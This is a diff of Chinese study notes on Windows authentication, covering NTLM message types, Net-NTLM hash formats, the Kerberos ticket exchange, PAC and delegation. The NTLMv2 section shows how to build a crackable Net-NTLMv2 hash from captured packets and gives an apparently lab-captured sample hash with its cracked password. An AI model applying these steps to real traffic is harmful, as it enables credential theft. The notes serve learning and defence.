+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/27.png)
+
+- type 2 质询
+
+ 这个过程是服务器用 type 2 消息(质询)进行响应,这包含服务器支持和同意的功能列表。但是,最重要的是,它包含服务器产生的 Challenge。
+
+ 主要包含以下结构
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/28.png)
+
+ 其中最主要的信息是 challenge。后面加密验证依赖于 challenge
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/29.png)
+
+- type 3 身份验证
+
+ 这个过程客户端接收到 challenge 之后,使用用户 hash 与 challenge 进行加密运算得到 response,将 response,username,challenge 发给服务器。消息中的 response 是最关键的部分,因为它向服务器证明客户端用户已经知道帐户密码。
+
+ 主要包含以下结构
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/30.png)
+
+ 这里的 Challeng 不同于 type2 的 Challenge,这里的 Challenge 是一个随机的客户端 nonce。
+
+ MIC 是校验和,设计 MIC 主要是为了防止这个包中途被修改
+
+ sessionkey 是在要求进行签名的时候用的,用来进行协商加密密钥,可能有些文章会说 sessionkey 就是加密密钥,需要拥有用户 hash 才能计算出来,因此攻击者算不出来,就无法加解密包。但是想想就不可能,这个 session_key 已经在流量里面明文传输,那攻击者拿到之后不就可以直接加解密包了。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/31.png)
![](../../../../assets/img/运维/Windows/笔记/认证/2.png)
-在以上流程中,登录用户的密码 hash 即 NTLM hash,response 中包含 Net-NTLM hash
+**注意**
-在 NTLM 认证中,NTLM 响应分为 NTLM v1,NTLMv2,NTLM session v2 三种协议,不同协议使用不同格式的 Challenge 和加密算法
+1. Chanllenge 是 Server 产生的一个 16 字节的随机数,每次认证都不同
+2. Response 的表现形式是 Net-NTLM Hash,它是由客户端提供的密码 Hash 加密 Server 返回的 Chanllenge 产生的结果。
-所以也就存在不同协议的 Net-NTLM hash,即 Net-NTLM v1 hash,Net-NTLM v2 hash
+---
-**NTLMv2 协议**
+### NTLMv2
-NTLMv1 和 NTLMv2 的加密因素都是 NTLM Hash,而最显著的区别就是 Challenge 和加密算法不同:
-- Challage: NTLMv1 的 Challenge 有8位,NTLMv2 的 Challenge 为16位。
+NTLMv1 和 NTLMv2 的加密因素都是 NTLM Hash,而最显著的区别就是 Challenge 和加密算法不同,共同点就是加密的原料都是 NTLM Hash。
+- Challage: NTLMv1 的 Challenge 有 8 位,NTLMv2 的 Challenge 为 16 位。
- Net-NTLM Hash:NTLMv1 的主要加密算法是 DES,NTLMv2 的主要加密算法是 HMAC-MD5。
-## PTH
+设置系统使用 LM 还是 NTLM 还是 NTLMv2,需要修改 Local Security Policy 中的 LmCompatibilityLevel 选项
-详细内容见 [Windows渗透](../../../安全/笔记/RedTeam/Windows渗透.md#PTHPTKPTT) PTH 部分
+![](../../../../assets/img/运维/Windows/笔记/认证/36.png)
---
-# 域认证
+### Net-NTLM hash
+
+在 type3 中的响应,有六种类型的响应
+1. LM(LAN Manager)响应 – 由大多数较早的客户端发送,这是“原始”响应类型。
+2. NTLM v1 响应 – 这是由基于 NT 的客户端发送的,包括 Windows 2000 和 XP。
+3. NTLMv2 响应 – 在 Windows NT Service Pack 4 中引入的一种较新的响应类型。它替换启用了 NTLM 版本 2 的系统上的 NTLM 响应。
+4. LMv2 响应 – 替代 NTLM 版本 2 系统上的 LM 响应。
+5. NTLM2 会话响应 – 用于在没有 NTLMv2 身份验证的情况下协商 NTLM2 会话安全性时,此方案会更改 LM NTLM 响应的语义。
+6. 匿名响应 – 当匿名上下文正在建立时使用; 没有提供实际的证书,也没有真正的身份验证。“存 根”字段显示在类型 3 消息中。
+
+这六种使用的加密流程一样,都是 Challenge/Response 验证机制,区别在 Challenge 和加密算法不同。
+
+在以上流程中,登录用户的密码 hash 即 NTLM hash,其中,经过 NTLM Hash 加密 Challenge 的结果在网络协议中称之为 Net NTLM Hash,response 中包含 Net-NTLM hash.
+
+在 NTLM 认证中,NTLM 响应分为 NTLM v1,NTLMv2,NTLM session v2 三种协议,不同协议使用不同格式的 Challenge 和加密算法.所以也就存在不同协议的 Net-NTLM hash,即 Net-NTLM v1 hash,Net-NTLM v2 hash
+
+---
+
+**Net-NTLM v1 hash**
+
+v1 是将 16字节的 NTLM hash 空填充为 21 个字节,然后分成三组,每组7比特,作为 3DES 加密算法的三组密钥,加密 Server 发来的 Challenge。 将这三个密文值连接起来得到 response。
+
+**Net-NTLM v2 hash**
+
+v2 将 Unicode 后的大写用户名与 Unicode 后的身份验证目标(在 Type 3 消息的”TargetName”字段中指定的域或服务器名称)拼在一起。请注意,用户名将转换为大写,而身份验证目标区分大小写,并且必须与“TargetName”字段中显示的大小写匹配。使用 16 字节 NTLM 哈希作为密钥,得到一个值。
+
+建一个 blob 信息
-域认证部分内容来自 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)]
+![](../../../../assets/img/运维/Windows/笔记/认证/32.png)
-## AD
+使用 16 字节 NTLMv2 哈希作为密钥,将 HMAC-MD5 消息认证代码算法加密一个值(来自 type 2 的 Challenge 与 Blob 拼接在一起)。得到一个 16 字节的 NTProofStr。
-Active Directory,活动目录简称 AD,是一个基于 DNS 并以树状的数据结构来组成网络服务存储了有关网络对象的信息,并以此作为基础对目录信息进行合乎逻辑的分层组织,让管理员和用户能够轻松地查找和使用这些信息。常网域都只有一个,在中型或大型的网络中,网域可能会有很多个,或是和其他公司或组织的 AD 相互链接。
+将 NTProofStr 与 Blob 拼接起来形成得到 response。至于选择哪个版本的响应由 LmCompatibilityLevel 决定。
-网络对象分为用户、用户组、计算机、域、组织单元以及安全策略。
+Challenge/Response 验证机制里面 type3 response 里面包含 Net-ntlm hash,NTLM v1 响应和 NTLMv2 响应对应的就是 Net-ntlm hash 分为 Net-ntlm hash v1 和 Net-ntlm hash v2。
-**活动目录(AD)功能**
+Net-ntlm hash v1 的格式为:
+> username::hostname:LM response:NTLM response:challenge
-- 服务器及客户端计算机管理 : 管理服务器及客户端计算机账户, 所有服务器及客户端计算机加入域管理并实施组策略。
-- 用户服务 : 管理用户域账户、用户信息、企业通讯录(与电子邮 件系统集成)、用户组管理、用户身份认证、用户授权管理等, 按省实施组管理策略。
-- 资源管理 : 管理打印机、文件共享服务等网络资源。
-- 桌面配置 : 系统管理员可以集中的配置各种桌面配置策略,如: 用户使用域中资源权限限制、界面功能的限制、应用程序执行特 征限制、网络连接限制、安全配置限制等。
-- 应用系统支撑 : 支持财务、人事、电子邮件、企业信息门户、办 公自动化、补丁管理、防病毒系统等各种应用系统。
+Net-ntlm hash v2 的格式为:
+> username::domain:challenge:HMAC-MD5:blob
-**存储方式**
+下面演示从 response 里面提取 NTLMv2
-- ntds.dit
+![](../../../../assets/img/运维/Windows/笔记/认证/33.png)
- ntds.dit 是 AD 中的数据库文件,它被保存在域控制器 `C:\Windows\NTDS\NTDS.dit` 位置。活动目录的数据库文件(ntds.dit)包含有关活动目录域中所有对象的所有信息,其中包含所有域用户和计算机帐户的密码哈希值。该文件在所有域控制器之间自动同步,它只能被域管理员访问和修改。
+这里的 challenge 是 type2 服务器返回的 challenge 不是 type3 流量包里面的 client Challenge
-- LDAP
+![](../../../../assets/img/运维/Windows/笔记/认证/34.png)
- ldap 是基于 tcp/ip 的轻量级目录访问协议,这种数据库文件后缀都为 `.ldif`,并使用特殊的节点查询语句来获取相应数据。和常规关系型数据库不同的是,ldap 并非按照常规的库、表、字段方式来存储数据,而是按照一种特殊的倒树状结构层级来组织管理数据,此处的树指的就是目录信息树,即 DIT。(目录信息树相当于专门用来进行读操作的数据库。)
+就是 18f77b6fe9f8d876
- 在目录信息树里创建一个条目(entry)时,条目的信息存储在属性(attribute)里,属性又被组合成对象类(objectClass),对象类进一步组成了架构(schema)
+HMAC-MD5 对应数据包中的 NTProofSt : 0ecfccd87d3bdb81713dc8c07e6705b6
- 在DIT内部则由N个条目entry所组成,就相当于常规数据库表中每条具体的记录,而条目的内容则是由具有唯一标识名 DN 的属性[Attribute]及属性对应的值[value]所组成的一个集合。
+![](../../../../assets/img/运维/Windows/笔记/认证/35.png)
+
+blob 就是 response 减去 NTProofStr。(因为在计算 response 的时候,response 就是由 NTProofStr 加上 blob)
+
+- username(要访问服务器的用户名):Administrator
+- domain(访问者主机名或者 ip):DESKTOP-QKM4NK7
+- challenge(数据包 2 中服务器返回的 challenge 值):18f77b6fe9f8d876
+- HMAC-MD5(数据包 3 中的 NTProofStr): 0ecfccd87d3bdb81713dc8c07e6705b6
+- blob(blob 对应数据为 NTLMv2 Response 开头去掉 NTProofStr 的后半部分):01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000
+
+所以最后,Net-NTLM v2 Hash 值为:
+```
+Administrator::DESKTOP-QKM4NK7:18f77b6fe9f8d876:0ecfccd87d3bdb81713dc8c07e6705b6:01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000
+```
- 条目为 ldap 中最基础的操作单位,通常对ldap的增、删、改、查都是以条目为基本单元进行的。
+上面的 Net-NTLM v2 Hash 值若使用 hashcat 爆破应为 Abcd1234
- 本地打开 LDAP 编辑器。运行->打开 `adsiedit.msc`(只有域控居于整个域内的配置信息)
+抓包过程见 [Wireshark笔记](../../../安全/工具/Wireshark.md#案例) 案例中 NTLMv2 部分
+
+---
+
+## 域环境中NTLM认证方式
+
+1. 用户通过输入 Windows 帐号和密码登录客户端主机,客户端会缓存密码的哈希值 NTLM-Hash。成功登录客户端的用户如果试图访问服务器资源,需要向对方发送一个请求,该请求利用 NTLM SSP 生成 NTLM_NEGOTIATE 消息 (被称为 TYPE 1 消息,Negotiate 协商消息),并将 TYPE 1 消息发送给服务端中,该 TYPE 1 消息中包含一个以明文表示的用户名以及其他的一些协商信息(认证的主体,机器以及需要使用的安全服务等等信息)
+
+2. 服务端接收到客户端发送过来的 TYPE 1 消息,会读取其中的内容,并从中选择出自己所能接受的服务内容,加密等级,安全服务等等。然后传入 NTLM SSP,得到 NTLM_CHALLENGE 消息(被称为 TYPE 2 消息,Challenge 挑战消息),并将此 TYPE 2 消息发回给客户端。此 TYPE 2 消息中包含了一个由服务端生成的16位随机值,此随机值被称为 Challenge,服务器将该 Challenge 保存起来。
+
+3. 客户端收到服务端返回的 TYPE 2 消息, 读取出服务端所支持的内容,并取出其中的随机值 Challenge,用缓存的密码的哈希值 NTLM-Hash 对其进行加密,得到 Net NTLM-Hash(加密后的 Challenge),并且将 Net NTLM-Hash 封装到 NTLM_AUTH 消息中(被称为 TYPE 3 消息, Authenticate认证消息),发往服务端。
+
+4. 服务器接收到客户端发送来的 NTLM_AUTH 的 TYPE 3 消息后,取出其中的 Net NTLM-Hash 值,并向 DC 域控(Domain Control)发送针对客户端的验证请求。该请求主要包含以下三方面的内容:客户端用户名、原始的 Challenge 和 加密后的 Challenge(也就是 Net NTLM-Hash)。
+
+5. DC 根据用户名获取该帐号的密码哈希值 NTLM-Hash,用密码哈希值 NTLM-Hash 对原始的 Challenge 进行加密得到 Net NTLM-Hash。如果加密后的 Challenge 和服务器发送的一致,则意味着用户拥有正确的密码,验证通过,否则验证失败。DC 将验证结果发给服务器。
+
+6. 服务器根据 DC 返回的结果,对客户端进行回复。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/21.png)
+
+抓包过程见 [Wireshark笔记](../../../安全/工具/Wireshark.md#案例) 案例中 域环境中NTLM认证方式 部分
+
+---
+
+## SSP & SSPI
+
+**SSPI(Security Support Provider Interface)**
+
+这是 Windows 定义的一套接口,此接口定义了与安全有关的功能函数,用来获得验证、信息完整性、信息隐私等安全功能,就是定义了一套接口函数用来身份验证,签名等,但是没有具体的实现。
+
+**SSP(Security Support Provider)**
+
+SSPI 的实现者,对 SSPI 相关功能函数的具体实现。微软自己实现了如下的 SSP,用于提供安全功能:
+- NTLM SSP
+- Kerberos
+- Cred SSP
+- Digest SSP
+- Negotiate SSP
+- Schannel SSP
+- Negotiate Extensions SSP
+- PKU2U SSP
+
+在系统层面,SSP 就是一个 dll,来实现身份验证等安全功能.不同的 SSP,实现的身份验证机制是不一样的。比如 NTLM SSP 实现的就是一种 Challenge/Response 验证机制。而 Kerberos 实现的就是基于 ticket 的身份验证机制。我们可以编写自己的 SSP,然后注册到操作系统中,让操作系统支持更多的自定义的身份验证方法。
+
+我们抓包分析 ntlm 的时候,就会看到 ntlm 是放在 GSS-API 里面
+
+![](../../../../assets/img/运维/Windows/笔记/认证/37.png)
+
+为啥这里会出现 GSSAPI 呢,SSPI 是 GSSAPI 的一个专有变体,进行了扩展并具有许多特定于 Windows 的数据类型。SSPI 生成和接受的令牌大多与 GSS-API 兼容。所以这里出现 GSSAPI 只是为了兼容,我们可以不必理会。可以直接从 NTLM SSP 开始看起。注册为 SSP 的一个好处就是,SSP 实现了了与安全有关的功能函数,那上层协议(比如 SMB)在进行身份认证等功能的时候,就可以不用考虑协议细节,只需要调用相关的函数即可。而认证过程中的流量嵌入在上层协议里面。不像 kerbreos,既可以镶嵌在上层协议里面,也可以作为独立的应用层协议。ntlm 是只能镶嵌在上层协议里面,消息的传输依赖于使用 ntlm 的上层协议。比如镶嵌在 SMB 协议里,或镶嵌在 HTTP 协议。
+
+---
+
+# 域认证
+
+域认证部分内容来自 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)]、[[彻底理解Windows认证 - 议题解读](https://payloads.online/archivers/2018-11-30/1)]
+
+---
## Kerberos
+**Kerberos 协议**
+
Kerberos 是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。软件设计上采用客户端/服务器结构,并且能够进行相互认证,即客户端和服务器端均可对对方进行身份认证。可以用于防止窃听、防止重放攻击、保护数据完整性等场合,是一种应用对称密钥体制进行密钥管理的系统。支持 SSO。Kerberos 的扩展产品也使用公开密钥加密方法进行认证。
-当有N个人使用该系统时,为确保在任意两个人之间进行秘密对话,系统至少保存有它与每个人的共享密钥,所需的最少会话密钥数为N个。
+当有 N 个人使用该系统时,为确保在任意两个人之间进行秘密对话,系统至少保存有它与每个人的共享密钥,所需的最少会话密钥数为 N 个。
Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方。Kerberos 协议的扩展可以为认证的某些阶段提供公钥密码学支持。
![](../../../../assets/img/运维/Windows/笔记/认证/3.png)
+---
+
+### 简要概括认证过程
+
+Kerberos 认证用于域环境中,它是一种基于票据(Ticket)的认证方式。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
+
+客户端要访问服务器的资源,需要首先购买服务端认可的 ST 服务票据。也就是说,客户端在访问服务器之前需要预先买好票,等待服务验票之后才能入场。但是这张票不能直接购买,需要一张 TGT 认购权证(Ticket Granting Ticket)。也就是说,客户端在买票之前必须先获得一张 TGT 认购权证。这张 TGT 认购权证和 ST 服务票据均由 KDC 发售。
+
+他的整个认证过程涉及到三方:客户端、服务端和 KDC(Key Distribution Center)。在 Windows 域环境中,由 DC(域控)来作为 KDC。
+
+Kerberos 认证过程如下:
+
+![](../../../../assets/img/运维/Windows/笔记/认证/25.png)
+
+1. client 向 kerberos 服务请求,希望获取访问 server 的权限。 kerberos 得到了这个消息,首先得判断 client 是否是可信赖的,也就是白名单黑名单的说法。这就是 AS 服务完成的工作,通过在 AD 中存储黑名单和白名单来区分 client。成功后,返回 AS 返回 TGT 给 client。
+
+2. client 得到了 TGT 后,继续向 kerberos 请求,希望获取访问 server 的权限。kerberos 又得到了这个消息,这时候通过 client 消息中的 TGT,判断出了 client 拥有了这个权限,给了 client 访问 server 的权限 ticket。
+
+3. client 得到 ticket 后,终于可以成功访问 server。这个 ticket 只是针对这个 server,其他 server 需要向 TGS 申请。
+
**Kerberos 认证所参与的角色**
- 访问服务的 Client
- 提供服务的 Server
@@ -154,7 +418,49 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
其中 KDC 服务默认安装在一个域的域控中,而 Client 和 Server 为域内的用户或者是服务,如 HTTP 服务、SQL 服务。在 Kerberos 中 Client 是否有权限访问 Server 端的服务由 KDC 发放的票据来决定
-**认证过程**
+**认证中涉及到的部分词汇**
+- Authentication Server : 为 Client 生成 TGT 的服务。 AS 的作用是验证 Client 端的身份,验证通过就会给一个 TGT 票据给 Client
+- AD(Account Database) : 活动目录,存储所有 Client 白名单,只有存在于白名单的 Client 才能申请到 AS 给的 TGT,类似于本机 SAM,在 DC 上
+- DC(Domain Controller) : 域控
+- KDC(Key Distribution Center) : 密钥分发中心,由域控担任
+- KAS(Kerberos Authentication Service) : Kerberos 认证服务
+- TGT(Ticket Granting Ticket) : 入场券,通过入场券能够获得票据,是一种临时凭证的存在
+- TGS(Ticket Granting Server) : 为 client 生成某个服务的 ticket。 TGS 的作用是通过 AS 发送给 Client 的 TGT 换取访问 Server 端的 ST 票据。ST 也有资料称为 TGS Ticket,为了和 TGS 区分,此处使用 ST
+- ST(Ticket) : 票据,是网络对象互相访问的凭证。
+- Session Key : 会话密钥,只有 Client 和 TGS 知道
+- krbtgt 账户:每个域控制器都有一个 krbtgt 的用户,是 KDC 的服务账户,用来创建票据授予服务(TGS)加密的密钥。
+
+**获得认购权证**
+
+首先,我们来看看客户端如何获得 `TGT 认购权证`。TGT 是 KDC 的 KAS 认证服务(Kerberos Authentication Service)发放的。
+
+1. 当某个用户通过输入域帐号和密码试图登录某台主机的时候,本机的 Kerberos 服务会向 KDC 的 KAS 认证服务发送一个认证请求。该请求主要包括两部分内容,明文形式的用户名和用用户秘钥加密原始 `Authenticator` 后得到的加密后 `Authenticator`(Authenticator 是客户端和服务端可以用于验证对方身份的一个东西)。
+
+2. 当 KDC 接收到请求之后,通过 AD 查询该用户名得到该用户的信息。通过查询得到的密码信息对 `Authenticator` 进行解密得到原始的 `Authenticator`。如果解密后的 `Authenticator` 和已知的 `Authenticator` 一致,则证明请求者提供的密码正确,即确定了登录者的真实身份。KAS 成功认证对方的身份之后,会先生成一个用用户密码加密后的用于确保该用户和 KDC 之间通信安全的 `Logon Session Key` 会话秘钥。KAS 接着为该用户创建 `TGT 认购权证`。`TGT` 主要包含两方面的内容:用户相关信息和原始 `Logon Session Key`,而整个 `TGT` 则通过 KDC 自己的密钥进行加密。最终,被不同密钥加密的 `Logon Session Key` 和 `TGT` 返回给客户端。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/22.png)
+
+**获得 ST 服务票据**
+
+经过上面的步骤,客户端获取了进入同域中其他主机入场券的 TGT 认购权证和 Logon Session Key,然后用自己的密钥解密 Logon Session Key 得到原始的 Logon Session Key。然后它会在本地缓存此 TGT 和原始 Logon Session Key。如果现在它需要访问某台服务器的资源,它就需要凭借这张 TGT 认购凭证向 KDC 购买相应的入场券。这里的入场券也有一个专有的名称——ST 服务票据(Service Ticket)。具体来说,ST 是通过 KDC 的另一个服务 TGS(Ticket Granting Service)出售的。
+
+1. 客户端先向 TGS 发送一个 `ST 购买请求`,该请求主要包含如下的内容:客户端用户名、通过 `Logon Session Key` 加密的 `Authenticator`、`TGT` 和访问的服务器名(其实是服务)。
+
+2. TGS 接收到请求之后,通过自己的秘钥解密 `TGT` 并得到原始 `Logon Session Key`,然后通过 `Logon Session Key` 解密 `Authenticator`,进而验证了对方的真实身份。TGS 完成对客户端的认证之后,会生成一个用 `Logon Session Key` 加密后的用于确保客户端-服务器之间通信安全的 `Service Session Key` 会话秘钥。然后为该客户端生成 `ST 服务票据`。`ST 服务票据`主要包含两方面的内容:客户端用户信息和原始 `Service Session Key`,整个 `ST` 通过服务器密码派生的秘钥进行加密。最终两个被加密的 `Service Session Key` 和 `ST` 回复给客户端。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/23.png)
+
+**用 ST 服务票据双向认证**
+
+1. 客户端接收到 TGS 回复后,通过缓存的 `Logon Session Key` 解密得到原始 `Service Session Key`,同时它也得到了进入服务器 `ST 服务票据`。该 `Serivce Session Key` 和 `ST 服务票据` 会被客户端缓存。客户端访问某服务器资源,将 `ST 服务票据` 和 `Service Session Key` 加密的 `Authenticator` 发送给服务端。
+
+2. 服务器收到客户端发来的 `ST 服务票据`。但是,服务端如何确保客户端发来的 `ST 服务票据` 是通过 `TGS` 购买,而不是自己伪造的呢?这很好办,不要忘了 ST 是通过服务器自己密码派生的秘钥进行加密的。具体的操作过程是这样的,服务器在接收到请求之后,先通过自己密码派生的秘钥解密 `ST`,并从中提取 `Service Session Key`。然后通过提取出来的 `Service Session Key` 解密 `Authenticator`,进而验证了客户端的真实身份。实际上,到目前为止,服务端已经完成了对客户端的验证,但是,整个认证过程还没有结束。谈到认证,很多人都认为只是服务器对客户端的认证,实际上在大部分场合,我们需要的是双向验证(Mutual Authentication),即访问者和被访问者互相验证对方的身份。现在服务器已经可以确保客户端是它所声称的那么用户,客户端还没有确认它所访问的不是一个钓鱼服务呢。为了解决客户端对服务器的验证,服务端需要将解密后的 `Authenticator` 再次用 `Service Session Key` 进行加密,并发挥给客户端。客户端再用缓存的 `Service Session Key` 进行解密,如果和之前的内容完全一样,则可以证明自己正在访问的服务器和自己拥有相同的 `Service Session Key`。双向认证过后,开始了服务资源的访问。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/24.png)
+
+---
+
+### 详细概括认证过程
![](../../../../assets/img/运维/Windows/笔记/认证/4.png)
@@ -169,21 +475,6 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
- The Client/Server Authentication Exchange: Client 与 Server 的交互
- AP_REQ
- AP_REP
-- 每次交互 Client 可以收到两条消息,一条是可以解密的,一条是无法解密的
-- Client 期望访问的服务或者主机从不直接与 KDC 通信
-- KDC 存储了其数据库下所有主机和服务的密钥
-- 密钥由密码加上一组随机数的哈希值,哈希算法由 Kerberos 的具体实现选择。对于服务和主机而言,其本身是没有密码的。一个密码实际上是由管理员的初始启动时产生和存储于服务和主机中的
-- 所有密钥存储于 KDC 数据库
-- KDC 本身由主密钥加密
-- 已经存在 Kerberos 的配置和实现采用公钥加密
-
-认证中涉及到的部分词汇:
-- AD(Account Database):存储所有 Client 白名单,只有存在于白名单的 Client 才能申请到 AS 给的 TGT。
-- Authentication Server: 为 Client 生成 TGT 的服务。 AS 的作用是验证 Client 端的身份,验证通过就会给一个TGT(Ticket Granting Ticket)票据给 Client。
-- Ticket Granting Server: 为 client 生成某个服务的 ticket。 TGS 的作用是通过 AS 发送给 Client 的票据(TGT)换取访问 Server 端的 ST 票据。ST(Service Ticket)也有资料称为 TGS Ticket,为了和 TGS 区分,此处使用 ST
-- Session Key:会话密钥,只有 Client 和 TGS 知道
-- 票据(Ticket):是网络对象互相访问的凭证。
-- TGT(Ticket Granting Ticket):入场券,通过入场券能够获得票据,是一种临时凭证的存在。
整体过程如图
@@ -207,7 +498,7 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
KRB-AS-REP:AS 收到用户认证请求后,AS 根据请求中的 `用户名 AA` 信息,从数据库中查找用户名是否存在。如果 `用户名 AA` 存在,则从 KDC 中可以获取 `用户 AA` 的密码,使用单向函数为该密码生成一个 `Client 密钥`(即NTLM Hash)。
- AS 生成随机字符串 `Client/TGS Session Key`,使用 `Client 密钥`(用户 AA 的密码 NTLM Hash )对 `Client/TGS Session Key` 加密得到 `sessionkey_as`;
+ AS 生成随机字符串 `Client/TGS Session Key`,使用 `Client 密钥`(用户 AA 的密码 NTLM Hash)对 `Client/TGS Session Key` 加密得到 `sessionkey_as`;
再使用 TGS 密钥(krbtgt 用户的 NTLM Hash)对 `Client/TGS Session Key` 、 `Client Info` 和 `Timestamp` 加密,得到 `TGT`(TGT票据)。
@@ -215,7 +506,9 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
Client 收到 AS 的响应消息后,利用自身的 `Client 密钥`(AA 的 NTLM Hash)对 `sessionkey_as` 解密,这样就获取到 `Client/TGS Session Key`。
- > AS 的响应消息中有一条是属于 Client 的,有一条是 TGS 的。
+ - AS 的响应消息中有一条是属于 Client 的,有一条是 TGS 的。
+ - TGT 的到期时间为 8 小时,如果超过了 8 小时,还需要重新申请 TGT,不能之间进入下一步获取 Ticket。
+ - KDC 返回的 TGT 客户端是无法解密的,因为它没有 KDC Hash,如果有,我们就可以伪造黄金票据
- **请求授权访问服务**
@@ -227,7 +520,8 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
将 `Authenticator2`、`TGT`、`Service ID`(要请求的服务 ID)发送给 KDC 中的 TGS。
- > 由于 TGT 是使用 `TGS 密钥`(krbtgt 的 NTLM Hash)加密的,Client 无法对 TGT 解密。
+ - 由于 TGT 是使用 `TGS 密钥`(krbtgt 的 NTLM Hash)加密的,Client 无法对 TGT 解密。
+ - 如果假设这个数据被中间人窃取到,也无法在短时间内破解,因为 KDC 会校验时间戳。
- **TGS 为 Client 响应服务授权票据**
@@ -251,13 +545,15 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
![](../../../../assets/img/运维/Windows/笔记/认证/13.png)
- - **Client 向SS(Service Server)发送服务请求**
+ - **Client 向 SS(Service Server)发送服务请求**
AP-REQ:Client 收到 `Client-To-Server Ticket`、`sessionkey_tgs` 之后,使用 `Client/TGS Session Key` 对 `sessionkey_tgs` 解密得到 `Client/Server Session Key`,然后使用 `Client/Server Session Key` 对 Client Info 和 timestamp 加密得到 `Authenticator3`
将 `Authenticator3` 和 `Client-To-Server Ticket` 发送给所请求服务的服务器(`Service Server`)。
- - **Service Server响应Client**
+ - Ticket 客户端无法解密
+
+ - **Service Server 响应 Client**
AP-REP:Service Server 收到客户端的服务访问请求之后,利用 Server 密钥(Server 的 ntlm Hash)对 `Client-To-Server Ticket` 解密,提取出 `Client/Server SessionKey`、Client ID 等信息。
@@ -283,6 +579,18 @@ Kerberos 协议基于对称密码学,并需要一个值得信赖的第三方
- Kerberos 协议和 NTLM 协议都会使用 NTLM Hash 对生成的任意随机数加密,然后比对结果。 Kerberos 的主要区别在于添加了第三方——-KDC 参与到认证过程中。
- Client info 中包含网络地址、Client ID 等信息
+---
+
+- 每次交互 Client 可以收到两条消息,一条是可以解密的,一条是无法解密的
+- Client 期望访问的服务或者主机从不直接与 KDC 通信
+- KDC 存储了其数据库下所有主机和服务的密钥
+- 密钥由密码加上一组随机数的哈希值,哈希算法由 Kerberos 的具体实现选择。对于服务和主机而言,其本身是没有密码的。一个密码实际上是由管理员的初始启动时产生和存储于服务和主机中的
+- 所有密钥存储于 KDC 数据库
+- KDC 本身由主密钥加密
+- 已经存在 Kerberos 的配置和实现采用公钥加密
+
+---
+
## PAC
上述为 RFC 规定的 Kerberos 认证授权流程(其中 NTLM Hash 是针对 Windows 举例的),而微软所实现的 Kerberos 工作流程与之则有所不同,其区别的关键就在于,KDC 所返回的 `KRB_AS_REP` 中将包含一组 PAC 的信息。
@@ -327,21 +635,7 @@ SPN 的格式:
通用服务类型 ,可参考 https://adsecurity.org/?page_id=183
-### SPN扫描
-
-详细内容见 [后渗透](../../../安全/笔记/RedTeam/后渗透.md#SPN扫描) SPN扫描部分
-
-### Kerberoast
-
-详细内容见 [Windows渗透](../../../安全/笔记/RedTeam/Windows渗透.md#kerberoast) Kerberoast 部分
-
-### Kerberoasting
-
-详细内容见 [Windows渗透](../../../安全/笔记/RedTeam/Windows渗透.md#kerberoasting) Kerberoasting 部分
-
-## PTT
-
-详细内容见 [Windows渗透](../../../安全/笔记/RedTeam/Windows渗透.md#pthptkptt) PTT 部分
+---
## 委派
@@ -370,7 +664,7 @@ SPN 的格式:
无约束委派过程中,如果攻击者截获了 Service A 验证的 ST 和 TGT,就可以用它们访问服务 B,进而模拟管理员访问任意服务,漫游内网。
-**约束委派 S4U2Proxy**
+### 约束委派
为了解决无约束委派的隐患,微软发布了约束委派(S4U2Proxy)。
@@ -382,7 +676,9 @@ SPN 的格式:
![](../../../../assets/img/运维/Windows/笔记/认证/18.png)
-**基于资源的约束委派**
+---
+
+### 基于资源的约束委派
传统的约束委派中仍然存在一些缺点,如无法进行跨域委派。微软在 Windows Server 2012 中引入了基于资源的约束委派,相对于传统的约束委派,主要有三处改进:
- 委派的权限授予给了拥有资源的后端(B)而不再是前端(A)
@@ -400,8 +696,12 @@ SPN 的格式:
---
**Source & Reference**
-
- [深刻理解windows安全认证机制](https://klionsec.github.io/2016/08/10/ntlm-kerberos/)
- [Windows用户密码的加密方法与破解](https://www.sqlsec.com/2019/11/winhash.html#toc-heading-2)
- [Windows下的密码hash——NTLM hash和Net-NTLM hash介绍](https://3gstudent.github.io/3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/)
